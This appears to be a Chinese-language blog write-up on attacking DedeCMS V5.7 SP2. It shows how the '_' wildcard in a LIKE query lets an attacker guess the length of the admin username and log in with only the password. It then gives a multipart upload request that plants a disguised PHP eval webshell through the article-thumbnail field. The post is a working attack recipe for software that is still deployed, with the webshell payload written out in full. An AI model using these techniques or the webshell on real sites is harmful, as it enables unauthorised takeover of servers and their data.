dedecms 渗透

dedecms 渗透

环境搭建

最新版dedecms即V5.7 SP2(从18年开始就已经没有更新了,应该是没有人维护了)。

织梦全版本漏洞扫描

织梦全版本漏洞扫描https://github.com/lengjibo/dedecmscan

c:\dedecmscan-master>python3 dedescan.py

dedecms 渗透

探测版本,探测后台地址,探测一些绝对路径泄露等。

dedecms 渗透

猜解织梦后台管理员用户名位数

在dede/login.php中

$res = $cuserLogin->checkUser($userid,$pwd);

在include/userlogin.class.php

/**
     *  检验用户是否正确
     *
     * @access    public
     * @param     string    $username  用户名
     * @param     string    $userpwd  密码
     * @return    string
     */
    function checkUser($username, $userpwd)
    {
        global $dsql;

        //只允许用户名和密码用0-9,a-z,A-Z,'@','_','.','-'这些字符
        $this->userName = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $username);
        $this->userPwd = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $userpwd);
        $pwd = substr(md5($this->userPwd), 5, 20);
        $dsql->SetQuery("SELECT admin.*,atype.purviews FROM `#@__admin` admin LEFT JOIN `#@__admintype` atype ON atype.rank=admin.usertype WHERE admin.userid LIKE '".$this->userName."' LIMIT 0,1");
        $dsql->Execute();
        $row = $dsql->GetObject();
        if(!isset($row->pwd))
        {
            return -1;
        }
        else if($pwd!=$row->pwd)
        {
            return -2;
        }
        else
        {
            $loginip = GetIP();
            $this->userID = $row->id;
            $this->userType = $row->usertype;
            $this->userChannel = $row->typeid;
            $this->userName = $row->uname;
            $this->userPurview = $row->purviews;
            $inquery = "UPDATE `#@__admin` SET loginip='$loginip',logintime='".time()."' WHERE id='".$row->id."'";
            $dsql->ExecuteNoneQuery($inquery);
            $sql = "UPDATE #@__member SET logintime=".time().", loginip='$loginip' WHERE mid=".$row->id;
            $dsql->ExecuteNoneQuery($sql);
            return 1;
        }
    }

在根据用户名查询密码的时候使用了like语句

WHERE admin.userid LIKE '".$this->userName."' LIMIT 0,1"
$this->userName = preg_replace("/[^0-9a-zA-Z_@!\.-]/", '', $username);

虽然在前面有把一些用户名不允许的字符给替换为空了, 想直接用%这种匹配任意数量字符的模糊查询出数据就不行了。
但是可以看到这个过滤没有把_替换为空。

对于LIKE,可以在模式中使用以下两个通配符:
%匹配任意数量的字符,甚至零个字符。
_只匹配一个字符。

本次测试,设置的账号密码是admin,admin

当输入四个_时,返回
dedecms 渗透
dedecms 渗透

当输入五个_时,返回
dedecms 渗透
dedecms 渗透

此时用户名已经验证通过,因此可以在不知道用户名的情况下,直接通过密码登录上。

后台getshell

在“我发布的文档”——》添加文档,缩略图处,上传文件

POST:

Content-Disposition: form-data; name="litpic"; filename="1.php"
Content-Type: image/jpeg

GIF89a
<?php
@eval($_POST[cmd]);
?>

dedecms 渗透

成功上传webshell

dedecms 渗透

参考

http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/

上一篇:dede根据任意栏目id获取*栏目名称的自定义函数


下一篇:织梦CMS/Dedecms添加自定义函数